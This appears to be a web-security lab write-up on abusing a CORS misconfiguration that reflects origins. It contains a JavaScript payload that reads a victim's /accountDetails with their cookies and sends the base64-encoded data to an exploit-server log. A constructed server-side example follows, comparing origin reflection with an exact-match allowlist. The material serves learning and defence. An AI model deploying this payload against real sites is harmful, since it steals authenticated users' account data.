# CORS

<figure><img src="https://1116580734-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F80DU0lRP27yfgYzc3pOF%2Fuploads%2Fi5JsOf6oKoMDmXDPpcoN%2Fimage.png?alt=media&#x26;token=255ab47f-ff12-446b-a72d-60658bbc693a" alt=""><figcaption></figcaption></figure>

```javascript
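// Cross-origin GET to the target's account endpoint.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://accd1fd41f49fd57c0710d75007f00b6.web-security-academy.net/accountDetails',true);
// Send the victim's cookies with the request. The response is readable here only
// if the target's CORS policy allows this origin together with credentials.
req.withCredentials = true;
req.send();

// On load, forward the base64-encoded response body to the exploit server's log.
function reqListener() {
   location='//exploit-acde1f681f31fd46c0970d7d01670029.web-security-academy.net//log?key='+btoa(this.responseText);
};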
```
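
The request above can read `/accountDetails` from another origin only if the response carries an `Access-Control-Allow-Origin` equal to the requesting origin together with `Access-Control-Allow-Credentials: true`. As an added example (not part of the original page; `ALLOWED_ORIGINS`, `corsHeadersFor`, `auditOrigins` and all origins are hypothetical and constructed), the server-side header decision that denies such a read, next to the reflecting pattern that permits it:

```javascript
// Constructed allowlist of origins trusted to read credentialed responses.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Weak pattern: echo whatever Origin the browser sent and allow credentials.
// Any site the user visits can then read authenticated responses.
function reflectingCorsHeaders(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened pattern: exact string match against the allowlist. No prefix,
// suffix or regex matching, and the literal "null" origin is never trusted.
function corsHeadersFor(origin) {
  // Vary on Origin so a shared cache never replays one origin's headers to another.
  const headers = { 'Vary': 'Origin' };
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) {
    return headers; // no ACAO header: the browser blocks the cross-origin read
  }
  headers['Access-Control-Allow-Origin'] = origin;
  headers['Access-Control-Allow-Credentials'] = 'true';
  return headers;
}

// Compare both policies over a list of Origin header values.
function auditOrigins(origins) {
  return origins.map((o) => ({
    origin: o,
    reflectingAllows: 'Access-Control-Allow-Origin' in reflectingCorsHeaders(o),
    allowlistAllows: 'Access-Control-Allow-Origin' in corsHeadersFor(o),
  }));
}

// Constructed sample Origin values: one trusted, three that must be refused.
const SAMPLE_ORIGINS = [
  'https://app.example.com',
  'https://app.example.com.untrusted.example', // lookalike suffix
  'http://app.example.com',                    // scheme downgrade
  'null',                                      // sandboxed iframe / data: URL
];
console.table(auditOrigins(SAMPLE_ORIGINS));
```
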
